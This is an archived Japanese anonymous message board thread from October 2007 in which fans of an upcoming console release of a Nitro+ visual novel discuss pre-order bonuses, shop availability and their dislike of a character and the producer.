184 :名無しって呼んでいいか?:2007/10/09(火) 17:35:45 ID:???
特典以外特に話題ねえな…

185 :名無しって呼んでいいか?:2007/10/09(火) 17:38:10 ID:???
>>169
遠まわしに質問してみたけど、なんかうまーいこと言われたよ
さすが広報

186 :名無しって呼んでいいか?:2007/10/09(火) 17:41:16 ID:???
>>185
なんて言われたの?

187 :名無しって呼んでいいか?:2007/10/09(火) 18:47:37 ID:???
冷微・・まろ様W特集だな

188 :名無しって呼んでいいか?:2007/10/09(火) 19:00:06 ID:???
「W」特集…

大笑い特集?

189 :名無しって呼んでいいか?:2007/10/10(水) 12:06:18 ID:???
アキラたんがマロをぶん殴るか踏み踏みしてるスチルがあったらいいな


190 :名無しって呼んでいいか?:2007/10/10(水) 14:17:12 ID:???
アキラたんがマロにそうされるのはあるかもしれないけど
アキラたんがマロをそうするのは無いと思う
だってマロは吉Pの大切な子だもの

191 :名無しって呼んでいいか?:2007/10/10(水) 14:44:53 ID:???
>>190
>だってマロは吉Pの大切な子だもの

吉Pは本気でそう思ってそうなのでシャレになりませんっ><

192 :名無しって呼んでいいか?:2007/10/10(水) 15:31:14 ID:???
吉Pの分身だって咎犬キャラならきっと萌えられるはず
そんなふうに考えていた時期が漏れにもありました

193 :名無しって呼んでいいか?:2007/10/10(水) 15:39:18 ID:???
まだだ!まだ諦めんよ!
発売して3週くらいプレイしてその事実をこの身に刻むまでは…!

194 :名無しって呼んでいいか?:2007/10/10(水) 15:40:57 ID:???
まろと吉P消えて

195 :名無しって呼んでいいか?:2007/10/10(水) 17:14:23 ID:???
まろは攻略キャラじやないよー

196 :名無しって呼んでいいか?:2007/10/10(水) 17:37:48 ID:???
>>195
それが真実なら住人の何割かは確実に狂喜乱舞w

197 :名無しって呼んでいいか?:2007/10/10(水) 17:46:03 ID:???
>>186
まとめると「まだ分からない」。もっとやんわりと言われたけど
でも決まってるけど(通販取り扱うにせよしないにせよ)言えないんだろうなー
て思った。他店との兼ね合いもあるから一番強い本家はまだ何も言えないんじゃない?
ニトダイくるにしても、他店の特典予約が終わってからだろうなー
と勝手に思った

198 :名無しって呼んでいいか?:2007/10/10(水) 18:23:21 ID:???
>>197
兄は発売日前日まで予約受付てるんですが…

発売日 : 2007/11/29予定
予約終了日 : 2007/11/28

199 :名無しって呼んでいいか?:2007/10/10(水) 18:55:54 ID:???
特典も取り扱い自体も来月発売なのに不明っていくらなんでもなぁ
複数買い出来ない人はもう予約済み多いだろうし
コンシュマーしかしない新規には
エロゲメーカーの通販を嫌がる層も多いだろうし
大丈夫かニトダイ。

200 :名無しって呼んでいいか?:2007/10/10(水) 19:00:20 ID:???
ニトダイはもういいや、他で予約したし期待しないで待つ


201 :名無しって呼んでいいか?:2007/10/10(水) 19:16:59 ID:???
>>199
>エロゲメーカーの通販を嫌がる層も多いだろうし

そういや最初はすごい抵抗あったなー
今は全然平気だけどw

202 :名無しって呼んでいいか?:2007/10/11(木) 03:25:40 ID:???
エロゲメーカーでもニトロは比較的ライトなので自分は気にならなかったけどなー

LE予約済みで発売日も近づいてるのに吉Pとまろのせいでちっともwktkしない
PC版発売前のテンションが懐かしい…

203 :名無しって呼んでいいか?:2007/10/11(木) 13:05:46 ID:???
>>195
そういや攻略キャラです、とは言われてないような気がした
どうだっけ

204 :名無しって呼んでいいか?:2007/10/11(木) 16:08:12 ID:???
まろは脇CPとしてトウヤとくっつけやすいよう攻略キャラじゃなかったり?w
吉Pがどうしてもまろを受けにしたいんだったらの話だけど

まろ益々要らない

205 :名無しって呼んでいいか?:2007/10/11(木) 18:22:07 ID:???
まろに罪はないのだろうが吉Pがチラついて萌えられぬ

206 :名無しって呼んでいいか?:2007/10/11(木) 21:51:36 ID:???
更新まだちんこ

207 :名無しって呼んでいいか?:2007/10/11(木) 21:53:59 ID:???
更新は金曜日じゃねーの?

208 :名無しって呼んでいいか?:2007/10/11(木) 22:01:33 ID:???
そうか

209 :名無しって呼んでいいか?:2007/10/12(金) 09:33:12 ID:???
今日更新かなー楽しみだ

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)